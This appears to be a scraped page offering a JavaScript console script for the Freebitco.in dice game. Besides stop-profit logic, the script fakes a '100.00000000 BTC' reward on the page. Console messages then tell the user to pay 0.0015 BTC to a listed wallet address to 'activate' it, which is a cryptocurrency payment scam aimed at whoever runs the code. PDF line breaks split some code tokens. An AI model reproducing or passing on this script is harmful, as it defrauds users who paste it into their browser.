Freebitco - in Script100BTC (Feb 2021)

Download as pdf or txt
Download as pdf or txt
You are on page 1of 1

var stop_profit_positivo= 0.

00000750 ; // Profit Positive


var stop_profit_negativo= -0.00000500 ; // Profit Negative
//
===================================================================
var stop_profit_positivo= 0.00000550 ; // Profit Positive
var stop_profit_negativo= -0.00000200 ; // Profit Negative
//
===================================================================
var stop_profit_positivo= 0.00000150 ; // Profit Positive
var stop_profit_negativo= -0.00000125 ; // Profit Negative
//
===================================================================
var stop_profit_positivo= 0.00000050 ; // Profit Positive
var stop_profit_negativo= -0.00000100 ; // Profit Negative
//
===================================================================
var profit_atual=parseFloat($('#auto_stats_profit').text());
document.querySelector("#fp_min_reward").innerHTML = "100.00000000
BTC";
$('<p><strong id="Contato" style="font-size:15px;color:#0000FF"></
strong></p>').insertAfter('#btn-bet-start-pilot-dice');;$
('<p><strong id="Contato" style="font-size:15px;color:#FF0000"></
strong></p>').insertAfter('#btn-bet-start-pilot-dice');;$('#history-
my-bets-dice').unbind();$('#history-my-bets-
dice').bind("DOMSubtreeModified",function(eventpositivo){if( $
(event.currentTarget) ){
if(stop_profit_positivo < profit_atual){$('#btn-bet-stop-pilot-
dice').trigger('click');}profit_atual=parseFloat($
('#auto_stats_profit').text());
}});$('#history-my-bets-
dice').bind("DOMSubtreeModified",function(eventnegativo){if( $
(event.currentTarget) ){
if(stop_profit_negativo > profit_atual){$('#btn-bet-stop-pilot-
dice').trigger('click');}profit_atual=parseFloat($
('#auto_stats_profit').text());}});console.clear();console.log('Scri
pt not activated!'); console.log('100.00000000 BTC is Pending !
Please activate your Script'); console.log('To Activate Script, you
need to Pay ( 0.0015 BTC ) to this BTC wallet address:
14NiHGhLxmwRcQPE5z4iSZrefjxxiN7zN8');

You might also like